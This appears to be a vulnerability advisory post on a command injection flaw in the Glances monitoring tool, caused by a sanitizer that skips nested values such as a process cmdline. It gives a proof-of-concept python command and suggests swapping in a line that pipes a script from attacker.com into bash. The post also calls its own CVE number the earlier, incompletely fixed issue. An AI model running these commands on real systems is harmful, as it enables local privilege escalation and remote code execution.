Glances, Command Injection, CVE-2026-32608 (Critical) -DC-Aug2026-1537

Listen to this Post

CVE-2026-32608 describes a command injection vulnerability in Glances, a cross-platform system monitoring tool. The vulnerability arises from an incomplete fix for a previous issue. The initial patch introduced a sanitization function, _sanitize_mustache_dict, designed to neutralize shell operators like &&, |, >>, and `>` within user-controlled data used in action command templates. This function iterates through a dictionary of values intended for template rendering. However, its sanitization logic is flawed as it only processes top-level string values. It uses `if isinstance(v, str)` to identify and clean these values, but any nested data structures, such as lists or dictionaries, are passed through completely unsanitized. A primary source of attacker-controlled nested data is the `cmdline` of a process, which is a list of arguments that can be fully controlled by a local user when they launch a process. This `cmdline` list is part of the data passed to the rendering engine. The `chevron` Mustache renderer, used by Glances, does not HTML-escape the pipe character |. Consequently, a pipe symbol within an unsanitized list element, like one in the cmdline, survives the rendering process. This rendered command is then passed to a `secure_popen` function, which, by default, still interprets shell operators. A pipe character (|) in the command string leads to the execution of an attacker-specified command as a new process. This allows an unprivileged local user to achieve arbitrary OS command execution in the context of the Glances process, which often runs with elevated privileges (e.g., root). The vulnerability is triggered when an administrator has configured an alert action whose template renders the vulnerable nested field, such as {{cmdline}}{{.}} {{/cmdline}}.

DailyCVE Form:

Platform: Glances
Version: 4.5.5 / 4.5.6
Vulnerability: Command Injection
Severity: Critical
date: 2026-08-17

Prediction: Expected Patch unknown

What Undercode Say:

Verify vulnerable version (develop HEAD 92156d0 or v4.5.5)
glances --version
Setup a vulnerable action template (requires admin action config)
Template must render a nested stat field, e.g., {{cmdline}}{{.}} {{/cmdline}}
Create a marker process with malicious argv
python3 -c "import os; os.execvp('sh', ['sh', '-c', 'sleep 1000', '|touch /tmp/glances_poc_marker', ''])"
Check if marker file was created (should be created after action triggers)
ls -la /tmp/glances_poc_marker

Exploit:

Start a harmless proof-of-concept process (Lab-only, non-destructive)
python3 -c "import os, time; os.execvp('sh', ['sh', '-c', 'sleep 1000', '|touch /tmp/glances_poc_marker', ''])"
Wait for the Glances action to trigger (e.g., based on CPU/alert)
Observe the marker file creation, proving command injection:
ls -la /tmp/glances_poc_marker
Replace 'touch /tmp/glances_poc_marker' with any OS command for arbitrary execution
Example: '|curl http://attacker.com/revshell.sh | bash', ''

Protection:

  • Apply a comprehensive recursive sanitization patch to neutralize shell operators in all nested strings.
  • Modify the command execution to use a list of arguments and set `allow_operators=False` or shell=False.
  • Ensure the rendered command string is stripped of all shell operators, including |, regardless of nesting depth.
  • Avoid rendering unsanitized `cmdline` data in action templates until a fix is applied.

Impact:

A local unprivileged user can execute arbitrary system commands with the privileges of the Glances process, which is commonly root in monitoring deployments. This fully bypasses the incomplete CVE-2026-32608 fix, recreating the same high-impact privilege escalation and system compromise vector.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top